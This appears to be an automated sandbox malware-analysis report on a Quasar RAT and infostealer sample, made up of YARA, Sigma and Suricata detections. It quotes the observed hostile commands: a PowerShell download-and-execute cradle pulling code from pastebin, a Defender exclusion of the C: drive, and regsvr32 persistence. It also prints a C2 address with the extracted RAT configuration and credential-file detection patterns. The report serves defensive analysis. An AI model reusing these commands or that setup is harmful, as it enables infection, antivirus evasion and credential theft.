17.2.regsvr32.exe.2bd12ae.0.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ef4c:$x1: Quasar.Common.Messages 0x29f275:$x1: Quasar.Common.Messages 0x2ab7fe:$x4: Uninstalling... good bye :-( 0x2acff3:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
17.2.regsvr32.exe.2bd12ae.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aadb0:$f1: FileZilla\recentservers.xml 0x2aadf0:$f2: FileZilla\sitemanager.xml 0x2aae32:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab07e:$b1: Chrome\User Data\ 0x2ab0d4:$b1: Chrome\User Data\ 0x2ab3ac:$b2: Mozilla\Firefox\Profiles 0x2ab4a8:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd42c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab600:$b4: Opera Software\Opera Stable\Login Data 0x2ab6ba:$b5: YandexBrowser\User Data\ 0x2ab728:$b5: YandexBrowser\User Data\ 0x2ab3fc:$s4: logins.json 0x2ab132:$a1: username_value 0x2ab150:$a2: password_value 0x2ab43c:$a3: encryptedUsername 0x2fd370:$a3: encryptedUsername 0x2ab460:$a4: encryptedPassword 0x2fd38e:$a4: encryptedPassword 0x2fd30c:$a5: httpRealm
17.2.regsvr32.exe.2bd12ae.0.raw.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab8e8:$s3: Process already elevated. 0x28ec4b:$s4: get_PotentiallyVulnerablePasswords 0x278d07:$s5: GetKeyloggerLogsDirectory 0x29e9d4:$s5: GetKeyloggerLogsDirectory 0x28ec6e:$s6: set_PotentiallyVulnerablePasswords 0x2fea5a:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
17.2.regsvr32.exe.2bd12ae.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
17.2.regsvr32.exe.2bd12ae.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28d14c:$x1: Quasar.Common.Messages 0x29d475:$x1: Quasar.Common.Messages 0x2a99fe:$x4: Uninstalling... good bye :-( 0x2ab1f3:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
17.2.regsvr32.exe.2bd12ae.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2a8fb0:$f1: FileZilla\recentservers.xml 0x2a8ff0:$f2: FileZilla\sitemanager.xml 0x2a9032:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2a927e:$b1: Chrome\User Data\ 0x2a92d4:$b1: Chrome\User Data\ 0x2a95ac:$b2: Mozilla\Firefox\Profiles 0x2a96a8:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fb62c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2a9800:$b4: Opera Software\Opera Stable\Login Data 0x2a98ba:$b5: YandexBrowser\User Data\ 0x2a9928:$b5: YandexBrowser\User Data\ 0x2a95fc:$s4: logins.json 0x2a9332:$a1: username_value 0x2a9350:$a2: password_value 0x2a963c:$a3: encryptedUsername 0x2fb570:$a3: encryptedUsername 0x2a9660:$a4: encryptedPassword 0x2fb58e:$a4: encryptedPassword 0x2fb50c:$a5: httpRealm
17.2.regsvr32.exe.2bd12ae.0.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x163116:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2a9ae8:$s3: Process already elevated. 0x28ce4b:$s4: get_PotentiallyVulnerablePasswords 0x276f07:$s5: GetKeyloggerLogsDirectory 0x29cbd4:$s5: GetKeyloggerLogsDirectory 0x28ce6e:$s6: set_PotentiallyVulnerablePasswords 0x2fcc5a:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
17.2.regsvr32.exe.1c3f0000.3.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
17.2.regsvr32.exe.1c3f0000.3.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28d14c:$x1: Quasar.Common.Messages 0x29d475:$x1: Quasar.Common.Messages 0x2a99fe:$x4: Uninstalling... good bye :-( 0x2ab1f3:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
17.2.regsvr32.exe.1c3f0000.3.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2a8fb0:$f1: FileZilla\recentservers.xml 0x2a8ff0:$f2: FileZilla\sitemanager.xml 0x2a9032:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2a927e:$b1: Chrome\User Data\ 0x2a92d4:$b1: Chrome\User Data\ 0x2a95ac:$b2: Mozilla\Firefox\Profiles 0x2a96a8:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fb62c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2a9800:$b4: Opera Software\Opera Stable\Login Data 0x2a98ba:$b5: YandexBrowser\User Data\ 0x2a9928:$b5: YandexBrowser\User Data\ 0x2a95fc:$s4: logins.json 0x2a9332:$a1: username_value 0x2a9350:$a2: password_value 0x2a963c:$a3: encryptedUsername 0x2fb570:$a3: encryptedUsername 0x2a9660:$a4: encryptedPassword 0x2fb58e:$a4: encryptedPassword 0x2fb50c:$a5: httpRealm
17.2.regsvr32.exe.1c3f0000.3.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x163116:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2a9ae8:$s3: Process already elevated. 0x28ce4b:$s4: get_PotentiallyVulnerablePasswords 0x276f07:$s5: GetKeyloggerLogsDirectory 0x29cbd4:$s5: GetKeyloggerLogsDirectory 0x28ce6e:$s6: set_PotentiallyVulnerablePasswords 0x2fcc5a:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
17.2.regsvr32.exe.2fa92de.1.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
17.2.regsvr32.exe.2fa92de.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.2.regsvr32.exe.2fa92de.1.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28ef4c:$x1: Quasar.Common.Messages 0x29f275:$x1: Quasar.Common.Messages 0x2ab7fe:$x4: Uninstalling... good bye :-( 0x2acff3:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
17.2.regsvr32.exe.2fa92de.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aadb0:$f1: FileZilla\recentservers.xml 0x2aadf0:$f2: FileZilla\sitemanager.xml 0x2aae32:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab07e:$b1: Chrome\User Data\ 0x2ab0d4:$b1: Chrome\User Data\ 0x2ab3ac:$b2: Mozilla\Firefox\Profiles 0x2ab4a8:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd42c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab600:$b4: Opera Software\Opera Stable\Login Data 0x2ab6ba:$b5: YandexBrowser\User Data\ 0x2ab728:$b5: YandexBrowser\User Data\ 0x2ab3fc:$s4: logins.json 0x2ab132:$a1: username_value 0x2ab150:$a2: password_value 0x2ab43c:$a3: encryptedUsername 0x2fd370:$a3: encryptedUsername 0x2ab460:$a4: encryptedPassword 0x2fd38e:$a4: encryptedPassword 0x2fd30c:$a5: httpRealm
17.2.regsvr32.exe.2fa92de.1.raw.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab8e8:$s3: Process already elevated. 0x28ec4b:$s4: get_PotentiallyVulnerablePasswords 0x278d07:$s5: GetKeyloggerLogsDirectory 0x29e9d4:$s5: GetKeyloggerLogsDirectory 0x28ec6e:$s6: set_PotentiallyVulnerablePasswords 0x2fea5a:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
Click to see the 33 entries

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious Child Process Of Regsvr32

Source: Process started

Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\d3d9_4.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2224, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }", ProcessId: 2228, ProcessName: powershell.exe

Sigma detected: PowerShell Download and Execution Cradles

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lO5lV39HDj.exe", ParentImage: C:\Users\user\Desktop\lO5lV39HDj.exe, ParentProcessId: 7924, ParentProcessName: lO5lV39HDj.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 8092, ProcessName: powershell.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lO5lV39HDj.exe", ParentImage: C:\Users\user\Desktop\lO5lV39HDj.exe, ParentProcessId: 7924, ParentProcessName: lO5lV39HDj.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 6444, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lO5lV39HDj.exe", ParentImage: C:\Users\user\Desktop\lO5lV39HDj.exe, ParentProcessId: 7924, ParentProcessName: lO5lV39HDj.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 8092, ProcessName: powershell.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0nzyxcux\0nzyxcux.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0nzyxcux\0nzyxcux.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8092, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0nzyxcux\0nzyxcux.cmdline", ProcessId: 1412, ProcessName: csc.exe

Sigma detected: Network Connection Initiated By Regsvr32.EXE

Source: Network Connection

Author: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 185.147.124.146, DestinationIsIpv6: false, DestinationPort: 4782, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 2224, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49992

Sigma detected: Potential Regsvr32 Commandline Flag Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\d3d9_4.drv", CommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\d3d9_4.drv", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp" /SL5="$401C6,2956477,245248,C:\Users\user\Downloads\BT.exe" /VERYSILENT, ParentImage: C:\Users\user\AppData\Local\Temp\is-N9K57.tmp\BT.tmp, ParentProcessId: 1836, ParentProcessName: BT.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\d3d9_4.drv", ProcessId: 3096, ProcessName: regsvr32.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lO5lV39HDj.exe", ParentImage: C:\Users\user\Desktop\lO5lV39HDj.exe, ParentProcessId: 7924, ParentProcessName: lO5lV39HDj.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 8092, ProcessName: powershell.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8092, TargetFilename: C:\Users\user\AppData\Local\Temp\0nzyxcux\0nzyxcux.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lO5lV39HDj.exe", ParentImage: C:\Users\user\Desktop\lO5lV39HDj.exe, ParentProcessId: 7924, ParentProcessName: lO5lV39HDj.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 8092, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0nzyxcux\0nzyxcux.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0nzyxcux\0nzyxcux.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8092, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0nzyxcux\0nzyxcux.cmdline", ProcessId: 1412, ProcessName: csc.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Powershell launch regsvr32

Source: Process started

Author: Joe Security: Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\d3d9_4.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2224, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\d3d9_4.drv' }) { exit 0 } else { exit 1 }", ProcessId: 2228, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-05T08:05:12.070268+0100	2035595	1	Domain Observed Used for C2 Detected	185.147.124.146	4782	192.168.2.10	49992	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-05T08:03:34.774601+0100	2803305	3	Unknown Traffic	192.168.2.10	49755	104.26.12.205	80	TCP
2025-02-05T08:03:35.305841+0100	2803305	3	Unknown Traffic	192.168.2.10	49759	208.95.112.1	80	TCP
2025-02-05T08:03:40.712110+0100	2803305	3	Unknown Traffic	192.168.2.10	49793	104.26.12.205	80	TCP
2025-02-05T08:03:40.715385+0100	2803305	3	Unknown Traffic	192.168.2.10	49794	104.26.12.205	80	TCP
2025-02-05T08:03:40.821451+0100	2803305	3	Unknown Traffic	192.168.2.10	49759	208.95.112.1	80	TCP
2025-02-05T08:03:41.208968+0100	2803305	3	Unknown Traffic	192.168.2.10	49799	208.95.112.1	80	TCP
2025-02-05T08:03:41.431552+0100	2803305	3	Unknown Traffic	192.168.2.10	49802	89.23.99.249	80	TCP
2025-02-05T08:03:41.788407+0100	2803305	3	Unknown Traffic	192.168.2.10	49803	89.23.99.249	80	TCP
2025-02-05T08:03:45.149587+0100	2803305	3	Unknown Traffic	192.168.2.10	49829	104.26.12.205	80	TCP
2025-02-05T08:03:45.316767+0100	2803305	3	Unknown Traffic	192.168.2.10	49799	208.95.112.1	80	TCP
2025-02-05T08:03:53.665214+0100	2803305	3	Unknown Traffic	192.168.2.10	49880	104.26.12.205	80	TCP
2025-02-05T08:03:53.821527+0100	2803305	3	Unknown Traffic	192.168.2.10	49799	208.95.112.1	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-05T08:03:36.645164+0100	1810007	1	Potentially Bad Traffic	192.168.2.10	49767	149.154.167.220	443	TCP
2025-02-05T08:03:45.995783+0100	1810007	1	Potentially Bad Traffic	192.168.2.10	49833	149.154.167.220	443	TCP
2025-02-05T08:04:05.634892+0100	1810007	1	Potentially Bad Traffic	192.168.2.10	49948	149.154.167.220	443	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-05T08:03:29.474338+0100	1810000	2	Potentially Bad Traffic	192.168.2.10	49713	104.20.4.235	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\Downloads\ST.exe

Avira: detection malicious, Label: HEUR/AGEN.1304457

Found malware configuration

Source: 17.2.regsvr32.exe.13839ac0.2.raw.unpack

Malware Configuration Extractor: Quasar {"Version": "1.4.1", "Host:Port": "185.147.124.146:4782;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "70595b2f-92ed-4cab-b358-5e9c155366b4", "StartupKey": "Quasar Client Startup", "Tag": "svchost32", "LogDirectoryName": "Logs", "ServerSignature": "QWTAPU96ZD4B5rzcGsMZTmvJMYuru/pfm79y1lQKhDBqJ8jx72Ry12Gq8DyaOAUJRkBMOVbj+C53qNTcsC2Xbz/001/c0K/zi6nNfZB/JdnTjxc647UWHBw7IsaYgClvWlQPN6ZPeVcgasY701EfnaEyYpSjRQKxfXndFerz6MOERmXY3cmfUfjHR3yqTOkqesdcctAVr+PV4tPO3KYdfQhy6P+vW4RzlDemRKwAVmcHM4xz43NiKNu0cw1fJ/N1PwkaT21Di+Cu9uZZPyuzilwa4yV9XvLQvAi5M0jwtfOfTDbeoBnPboldK3Dz0KHCC64BCiFThbUps6K1z6/XDP+bllDhMGLxu8SLcPzGsbb4yOzgW2dbnDT7aNbPVTXjefAx2A7hPyfGJGfNptkN0Gs52cV/FLy4VGMh9O6Wo04gneYRJ6h3yr9rvU1NjLPIx/3b0O9F9S3SEcVwW69SuWmrQsaBUYPdS1xhJVf7HyyQMX2ZckAwZxwNuz9kYEB72R8FyySQ/FWonv+jE7jDcEZWA2KlGBjfn35PqNLuoPLljsSs9YIrfE9Wm521NwIVHoi1kBvpxVt6IzCrmjauj/ayt9HF7R3mTtTedD7UZlE3vp80EYGCg2W8RQkjHlNygD0s2Lyr24+/fxxwW13ZjLs/U1W3M+3RvMnqcVQiI+E=", "ServerCertificate": "MIIE9jCCAt6gAwIBAgIQAKCGorTxUxixTgWTfRLobzANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFQaGFudG9tIFNlcnZlciBDQTAgFw0yNTAxMjIxNDE1MTZaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRUGhhbnRvbSBTZXJ2ZXIgQ0EwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDBroHhM07SjKOMLI9aSIowOMoinGujkAsuPsMTcg2C/x4EDyjfNz6fdFiBb8k7lBAMsKDsW4etU8CMhXxFox4HL3bBGUKQnb1ttQUO9Q9okkvN9J8SmxMX4rm7tgu91V9gxcvp0BkxTE2haYQVy/f9YMYooDc1gPD2KXUPlsRbEE6dwj9b0Inlo4a84FlXSbpcEWmqxBmfCVkLHuNC/e9T3LajN6EhSthfCr9CNt0YoSJMBVOCxvomKCYqJP23tIhq3I74rCIwPZT/mi9R8hMf7qgvgbhqL6/ngQw1lB3bLYN3mlATUbmuQOcijAa8OiusfXDYevIB1h4hGfd2gxxGQkcwtiG3SMoz6rPI6ms9jHxmvwcms29rMKmoBw/HYOLJEjMMN2Iyo/Kqlk2tRbNLQp8/MBQSyP73+M8SyuC0bSHakND2dmQUoDtk0GYgR1sL2LOA8s+lRQtLHFCgywoTzlJ7F/yGWbW1/V9YV4VQr5Zy0Tp9rLQzavTruhuSQklVAACLE5jadmRo4CrY4Gbo++Brd0NK3OU3MqwatmUS8L9k7E6VjxVNySvoBMHsYZYywH37njhiyAM1txCgx2NS8Qo7wBrwZWZN8JdTrJpslVn45aUdsv02MWnSEdi8TspUFjRMLlovpMIdPzNKDy3/tVWefTjx6Rz2u1YLnJ09ZQIDAQABozIwMDAdBgNVHQ4EFgQUKBmnQWPxQPRDYfUKSkc8q2ExyVswDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAiUke+gZyNUAi7CQpI/iTtoAhZUOKn8ViGYeWAblZmht+zi4HKehfi7RtzawmNEbPJd8MbDrpRvyuaC34XQlpp/BAeAZkdC+Uhn39O/yzceokcwCt487h/C93DhR7v7ASk1QaCdEnqZdPIwM7WaqozghtKox5zKWcK12R1OqAEXhWdA2jyqRBx4ooGCqQJOWvKbarpp6o17wqime0VI50MInWxRpGAkJvxEeQhoqG2/xUTRfWOzjFVcOGDpFTU/BLcWnfzB5sw1RjM7IbCv3W8sYkd4C3sqgGvsKyjH9Nj6lC9CKXz1PhlDCWtY79bf6enfo1P0jkqT5dBhtunIiCyuI840CVbqsrqGyT6XpfYOEx6dji9dJiFY5tddR1OQFelmLTs/PMALa6cLN4SFsR087wtRUG+L+SV+BtBkoo1dsLboARgAlrmbtv1CpQBl9opgzAX1bz/NvnoVx5y+KkAIDgR8xhWDbMPzj6mn2NLYlSSEtA4JHfxTZVPG7PhXq3yAHB5xt914TYuGcMaONyIJsX33OiLte2GunTNLlZtkf/2g8o4ifJBMN5o2SCgkfbeaMKm3WmqSo5pxG19wy31NSm04ckOJ3Gn7+tKd2nIJLWo0Tc3Da9e/N/8PK4LpMEF3PltlKWGifhfGa5Yo8iGC1bQ2aZq/dcikTBn8CHj5s="}

Multi AV Scanner detection for dropped file

